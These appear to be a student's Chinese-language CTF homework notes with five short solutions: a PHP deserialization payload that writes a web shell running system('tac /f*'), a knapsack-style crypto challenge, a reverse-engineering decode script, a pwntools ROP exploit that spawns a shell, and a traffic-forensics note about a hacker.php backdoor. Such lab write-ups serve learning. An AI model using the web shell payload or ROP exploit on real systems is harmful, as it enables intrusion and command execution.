2.9作业

1

 绕过wakeup,sleep

$u,$p

code=$u.$p

<?php
class ctfshowvip
{
    public $username;
    public $password;
    public $code;
 
    public function __construct($u, $p)
    {
        $this->username = $u;
        $this->password = $p;
    }
}
$c = new ctfshowvip('877.php',"<?php system('tac /f*');?>");
echo serialize($c);

2

 私钥由公钥产生

from Crypto.Util.number import *
import random
from secret import flag
 
 
def GET_KEY(n):
    sum=2
    key=[1]
    for i in range(n):
        r=random.randint(0,1)
        x=sum+random.randint(0,n)*r
        key.append(x)
        sum+=x
    return key
 
def enc(m,k):
    cipher_list = []
    for i in range(len(m)):
        if m[i] == 1:
            cipher_list.append(m[i] * k[i])
    cipher = sum(cipher_list)
    return cipher
 
m=bytes_to_long(flag)
m = [int(bit) for byte in flag for bit in format(byte, '08b')]
key=GET_KEY(len(m))
c=enc(m,key)
 
with open('output.txt', 'w') as f:
    f.write(str(c))
    f.write(str(key))
 
 

3

 攻防世界666

封装函数，双击追踪flag

strcmp追踪flag encode以后的字符

a2="izwhroz\"\"w\"v.K\".Ni"
key=18
v3=""
flag=""

#操作，但长度不变的

for i in range(0,18,3):
    v3=a2[i]
    flag+=chr((ord(v3)^key) - 6)

    v3=a2[i+1]
    flag+=chr((ord(v3)^key) +6)

    v3=a2[i+2]
    flag+=chr((ord(v3)^key)^6)
#三个一组，1，2，3

4

from pwn import *
context.arch="amd64"

io =process("./rop")
elf=ELF("./rop")

#全局搜索函数
system_addr=elf.sym["system"]

sh_addr=next(elf.search(b"sh\x00"))

#asm
pop_rdi_ret=next(elf.search(asm("pop rdi; ret")))
#获得含有return的地址
ret_addr=next(elf.search(asm("ret")))


payload = b"b"*(0x20+0x8)+p64(ret_addr)
payload+=p64(pop_rdi_ret)+p64(sh_addr)+p64(system_addr)


io.sendline(payload)
io.interactive()

5

“找出攻击者的IP”

http协议中，

可疑：POST了hacker.php,追踪hacker.php，url解码，确认是开了个后门